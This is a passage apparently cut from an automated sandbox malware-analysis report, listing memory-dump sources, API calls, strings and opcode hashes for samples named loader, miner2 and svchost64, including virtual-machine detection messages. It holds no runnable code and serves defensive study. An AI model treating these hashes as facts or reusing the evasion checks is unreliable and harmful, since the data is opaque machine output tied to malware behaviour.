• VirtualQuery failed for %d bytes at address %p, xrefs: 004032B8
• Address %p has no image-section, xrefs: 004032C9
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: QueryVirtual
• String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
• API String ID: 1804819252-2123141913
• Opcode ID: 9c57dac23c483cc4d857320043402fb79bf7a79e36c6cfd7f1dc33e7f70dcb75
• Instruction ID: 8c231c32730a40bc13f921d250129705830e11279a8bba98ea914987c5d32c44
• Opcode Fuzzy Hash: 9c57dac23c483cc4d857320043402fb79bf7a79e36c6cfd7f1dc33e7f70dcb75
• Instruction Fuzzy Hash: BA51B3B3701B4086DB118F26EC407597BA5F789BA9F088626DF59277D4DB3CC646C708
APIs
Strings
• Device may be virtual., xrefs: 00401B22
• Program started in virtual machine., xrefs: 00401AFE
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: exitputs
• String ID: Device may be virtual.$Program started in virtual machine.
• API String ID: 3126681908-2466117216
• Opcode ID: 688843aee465fa4b2caf09cd31bc2807d149b93eea2607e079f563f3a68d1312
• Instruction ID: 28ff8e205e6b1fc29dc0a525ce5d1480b60f0643d2363600b81d42351452ebe2
• Opcode Fuzzy Hash: 688843aee465fa4b2caf09cd31bc2807d149b93eea2607e079f563f3a68d1312
• Instruction Fuzzy Hash: 98E04F7161000099F300B772E81B3AD262157E4308F44447BAB097F2E2DE7CCA95866D
APIs
• GetSystemTimeAsFileTime.KERNEL32 ref: 00402CF5
• GetCurrentProcessId.KERNEL32 ref: 00402D00
• GetCurrentThreadId.KERNEL32 ref: 00402D09
• GetTickCount.KERNEL32 ref: 00402D11
• QueryPerformanceCounter.KERNEL32 ref: 00402D1E
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
• String ID:
• API String ID: 1445889803-0
• Opcode ID: 9101069884a8374435b55088dc69beb5d46b46d3a1c6f9f53c2dd12352552ff0
• Instruction ID: 3d40a7e008acd1dc58858779c40122e5c62eac1c9c50c61d529e2d738f8c795a
• Opcode Fuzzy Hash: 9101069884a8374435b55088dc69beb5d46b46d3a1c6f9f53c2dd12352552ff0
• Instruction Fuzzy Hash: ED118CA6616B1185FB204B25FC0831A7360FB48BB4F4806319F9C137E4EB3CC986C748
APIs
• GetModuleHandleW.KERNEL32(?,?,?,?,?,?,00404208), ref: 00404261
• GetProcAddress.KERNEL32(?,?,?,?,?,?,00404208), ref: 00404271
Strings
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: AddressHandleModuleProc
• String ID: msvcrt.dll$vsprintf_s
• API String ID: 1646373207-1988861753
APIs
Strings
• Unknown error, xrefs: 004030A0
• _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fprintf
• String ID: Unknown error$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-3474627141
APIs
Strings
• Argument singularity (SIGN), xrefs: 00403050
• _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fprintf
• String ID: Argument singularity (SIGN)$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-2468659920
APIs
Strings
• Overflow range error (OVERFLOW), xrefs: 00403060
• _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fprintf
• String ID: Overflow range error (OVERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-4064033741
APIs
Strings
• The result is too small to be represented (UNDERFLOW), xrefs: 00403070
• _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fprintf
• String ID: The result is too small to be represented (UNDERFLOW)$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-2187435201
APIs
Strings
• _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
• Total loss of significance (TLOSS), xrefs: 00403080
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fprintf
• String ID: Total loss of significance (TLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-4273532761
APIs
Strings
• _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
• Partial loss of significance (PLOSS), xrefs: 00403090
Memory Dump Source
• Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
• Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
Similarity
• API ID: fprintf
• String ID: Partial loss of significance (PLOSS)$_matherr(): %s in %s(%g, %g) (retval=%g)
• API String ID: 383729395-4283191376
                                                                                                                                                                  APIs
                                                                                                                                                                  Strings
                                                                                                                                                                  • _matherr(): %s in %s(%g, %g) (retval=%g), xrefs: 0040300D
                                                                                                                                                                  • Argument domain error (DOMAIN), xrefs: 00402FE1
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: fprintf
                                                                                                                                                                  • String ID: Argument domain error (DOMAIN)$_matherr(): %s in %s(%g, %g) (retval=%g)
                                                                                                                                                                  • API String ID: 383729395-2713391170
                                                                                                                                                                  • Opcode ID: 19f9509d62011d14b053ccca3954fb4e65a1af42faa987aac2694f1ce9213707
                                                                                                                                                                  • Instruction ID: bc1a01331a64b29a46880244e8cc94783991fe0971f42baf4b00ecd47296b570
                                                                                                                                                                  • Opcode Fuzzy Hash: 19f9509d62011d14b053ccca3954fb4e65a1af42faa987aac2694f1ce9213707
                                                                                                                                                                  • Instruction Fuzzy Hash: 26F09662404F4481D2019F18A80039B7370FF5D789F155316EF893A524DF38C5838704
                                                                                                                                                                  APIs
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000007.00000002.3019588351.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                  • Associated: 00000007.00000002.3019515090.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019688876.0000000000406000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019761342.000000000040B000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019857600.000000000040F000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                                  • Associated: 00000007.00000002.3019945694.0000000000414000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_7_2_400000_loader_5879465914.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID: CriticalSection$EnterLeavefree
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID: 4020351045-0
                                                                                                                                                                  • Opcode ID: ceb08392f0f0196451ed73ec1588cb59bb9190dd5b54884ddebfc31a683c845f
                                                                                                                                                                  • Instruction ID: 49b5b9d9f717b9c60c7d99ed3eeeed97c410c8773a172d4d4432b2e755920db8
                                                                                                                                                                  • Opcode Fuzzy Hash: ceb08392f0f0196451ed73ec1588cb59bb9190dd5b54884ddebfc31a683c845f
                                                                                                                                                                  • Instruction Fuzzy Hash: 3A0192A1311704C2DA08EF15E89032537B4F794B89F544836CB0DA33A1DB3CDA91C34D
                                                                                                                                                                  Strings
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID: 3CM_^
                                                                                                                                                                  • API String ID: 0-3911827768
                                                                                                                                                                  • Opcode ID: 273d9aad3edd6273a0d0221e28a8857e3cb09b4e723599564a4fcdde52afe6a2
                                                                                                                                                                  • Instruction ID: 80636fa65411ea63ec075ed1752ed2de58adbd437d17aebe17edeaff8b14a7f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 273d9aad3edd6273a0d0221e28a8857e3cb09b4e723599564a4fcdde52afe6a2
                                                                                                                                                                  • Instruction Fuzzy Hash: 1A81A221B18D494FE7A4FB7C8469BB977D2EFA8314F0406B9E05DC72EBDD68A8418341
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: ccab738c0db944975b6bf905172f6ec2fb658a0146dcc0879398422d89502182
                                                                                                                                                                  • Instruction ID: 13fe929c9560ba1d67c7d2b25ddb3f309c47e76a1828d628500686fa7a302c7b
                                                                                                                                                                  • Opcode Fuzzy Hash: ccab738c0db944975b6bf905172f6ec2fb658a0146dcc0879398422d89502182
                                                                                                                                                                  • Instruction Fuzzy Hash: 78713C20B1DA894FD765FB6C98656B97BE1EF9A314F0401BAF08DC3293DD586C42C346
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1d48319ab43bf7688727df1438c0bf2f898ce7e269ca8a68df917d395a1711b8
                                                                                                                                                                  • Instruction ID: f6a8bab34af59d4083f9464afda4b6636462d71d44e6fe1fbd8dc849cef52f30
                                                                                                                                                                  • Opcode Fuzzy Hash: 1d48319ab43bf7688727df1438c0bf2f898ce7e269ca8a68df917d395a1711b8
                                                                                                                                                                  • Instruction Fuzzy Hash: 8A51D630B1DA494FEB58FB6C94656B877D1EF99714F05017AE04DC32A3DD64AC428346
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 2cc76266e1e11fb06b9e739880d144e0bdf4a920dfef7990056ab6eef277c494
                                                                                                                                                                  • Instruction ID: 97c56dd2c4c623cb9eb6a488dac250fe491646c2b86028091be8aaa486ed01f8
                                                                                                                                                                  • Opcode Fuzzy Hash: 2cc76266e1e11fb06b9e739880d144e0bdf4a920dfef7990056ab6eef277c494
                                                                                                                                                                  • Instruction Fuzzy Hash: DF51D730B1DA094FEBA8FB6C94697BD77D1EF99714F05017AE04DC3292DE64AC428345
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 00000055.00000002.2684088948.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_85_2_7ffd9bac0000_miner2.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 1001d2c60be98d25b574984f001a96c03a1109d665d4afd9b908603d778e4c69
                                                                                                                                                                  • Instruction ID: 532a846705b903d0977d45e3b36904522b6952d91ec4c116ed523567616ea058
                                                                                                                                                                  • Opcode Fuzzy Hash: 1001d2c60be98d25b574984f001a96c03a1109d665d4afd9b908603d778e4c69
                                                                                                                                                                  • Instruction Fuzzy Hash: 05F0E57351D74C1EE758A559AC179F63B98EB83270F00105FE19EC6153E1526913C256
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: aaee7ed06daccbd9b364a9618b5c3ec003dc6358c9baba43cf8edb6313356e6a
                                                                                                                                                                  • Instruction ID: 7836dfc56866fb7dec924b09efd2536034403bf58dc6424f0875d55c1dac01f1
                                                                                                                                                                  • Opcode Fuzzy Hash: aaee7ed06daccbd9b364a9618b5c3ec003dc6358c9baba43cf8edb6313356e6a
                                                                                                                                                                  • Instruction Fuzzy Hash: 9F92A330B1991D8FEBA4FB688465B79B3E2FF98304F5541B9D00EC32E6DE68AD418741
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: e1dd3b5169c21fa30b1626c5efd78199b69a7b602660d78af6fdeb936482613b
                                                                                                                                                                  • Instruction ID: 370f8d32083e556cc6e084ebaf57629ecfef1b2353d7f3265d80abed6a5330bd
                                                                                                                                                                  • Opcode Fuzzy Hash: e1dd3b5169c21fa30b1626c5efd78199b69a7b602660d78af6fdeb936482613b
                                                                                                                                                                  • Instruction Fuzzy Hash: 7D315922B0EB8A4FE361AB7C88316B93BE0EF16354B0501FAD09ACB1E7CD5868058351
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                  • Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
                                                                                                                                                                  Similarity
                                                                                                                                                                  • API ID:
                                                                                                                                                                  • String ID:
                                                                                                                                                                  • API String ID:
                                                                                                                                                                  • Opcode ID: 52224eeed6b2e6b3a501bc291a5560dbdf63f8754090a519c0e1a4f3e74f16a9
                                                                                                                                                                  • Instruction ID: 0334346edd36a5cfc94a01975cb32698e378e5923a0f89f1974c5b2ee5180a5f
                                                                                                                                                                  • Opcode Fuzzy Hash: 52224eeed6b2e6b3a501bc291a5560dbdf63f8754090a519c0e1a4f3e74f16a9
                                                                                                                                                                  • Instruction Fuzzy Hash: 0A817031F19A5D4FDB94EBA8C8A4AAC7BF1FF59300F4501B6D009D72A6DE28A8418B41
                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                  • Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 0a542643766d236e73e93b9f6d5fd51771b5d7b9f7f336dc4141a8ac11fe3ff7
• Instruction ID: 1ccd51b44fa0d3f8b4aabb77510192ac31e6bbffb3ddbd0ccbf8deb1058463e3
• Opcode Fuzzy Hash: 0a542643766d236e73e93b9f6d5fd51771b5d7b9f7f336dc4141a8ac11fe3ff7
• Instruction Fuzzy Hash: EB616235F0995D8FDB64FBA8C8A4ABC77B1FF58300F4101B6D009D72A6DE24A941CB41

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 34853649384dbba900f3a52e66b2ae9a9b585a84cacfab1b5a2afe05f9ee00d0
• Instruction ID: e7a4ce241463fcdcf407a719413ae962e8d2c71c2edc5a08bb3f6916a90e42d8
• Opcode Fuzzy Hash: 34853649384dbba900f3a52e66b2ae9a9b585a84cacfab1b5a2afe05f9ee00d0
• Instruction Fuzzy Hash: 8151C330B2CA494FEB58EB2C8469A7977D1FF9C708F040679E08EC3396DE64AC428745

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 31704ed5328d33d5adf6962fbc8eacbb2192172357a5f7d0b295968511059de3
• Instruction ID: 3ab2029322f27aaac67a947edca07269e957a2ae2d421684168811374f233f39
• Opcode Fuzzy Hash: 31704ed5328d33d5adf6962fbc8eacbb2192172357a5f7d0b295968511059de3
• Instruction Fuzzy Hash: EA514F31F1995D8FDB54FBA8C8A4AACB7B1FF58300F4001B5D009D7296DE78A845CB41

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: cb1560df28c6f45d4b452155a9155509c165207abb09d9207c305f64f5db244e
• Instruction ID: b0f614eb93ad2774ab70b1cd5d13bdfc64daa86188558c02c9c3aa341bc97978
• Opcode Fuzzy Hash: cb1560df28c6f45d4b452155a9155509c165207abb09d9207c305f64f5db244e
• Instruction Fuzzy Hash: D0513030F1995D8FDB54FBA8C8A4AADB7B1FF58304F4005B5E009D729ADE78A845CB41

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 878e0d15efe70f2427f4d01277dd67458e72a6836b81b31eb80fce8f88bca352
• Instruction ID: 64031c520c7aef6bf5ff38d8baf7bb205d23be246b8e1cd2e3edcf187a4c77cd
• Opcode Fuzzy Hash: 878e0d15efe70f2427f4d01277dd67458e72a6836b81b31eb80fce8f88bca352
• Instruction Fuzzy Hash: 2241D321B1DA494FEB68EB6C8469BB977D1EF98704F040279F08DC32D7DDA8AC428745

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2887aba253f61efabb7528e4c4fc23beac3da36fdbcf3f850817f8db4c965c11
• Instruction ID: 56596d1a7e4db32c612eb44d7c5f2446fc85fe100c6f539af39e942a23e266c0
• Opcode Fuzzy Hash: 2887aba253f61efabb7528e4c4fc23beac3da36fdbcf3f850817f8db4c965c11
• Instruction Fuzzy Hash: DA512E30E1995D8FDB54FBA8C8A4AADB7B1FF58304F4005B5E009D729ADE74A941CB41

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 2cfb4be5f4a35f5690e27671bb299b1e8829d9664ea6669bf88463902898750d
• Instruction ID: 308ed54047cac5a436a68a052d7b6cd078fe663052eef2163fc01043b2896457
• Opcode Fuzzy Hash: 2cfb4be5f4a35f5690e27671bb299b1e8829d9664ea6669bf88463902898750d
• Instruction Fuzzy Hash: 51F055B260D70C1EE758A609AC079F63798EB83230F00100EE19EC2143E01228138292

Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8b34e6950548300683ce4e18b3264b80ffc8d20b178456510e012c1908f12165
• Instruction ID: 0c5ac9c65bb331a33d1f9a7a7adb6d0777837bbcf96cbd2e4f19dfe1150f778b
• Opcode Fuzzy Hash: 8b34e6950548300683ce4e18b3264b80ffc8d20b178456510e012c1908f12165
• Instruction Fuzzy Hash: 82E08021F18C1D0F9AA4FB3D5865E6563D2EFDC32074546F6E40CC329ADD28DC414381

Strings
Memory Dump Source
• Source File: 0000006B.00000002.2708984076.00007FFD9BAC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAC0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_107_2_7ffd9bac0000_svchost64.jbxd
Similarity
• API ID:
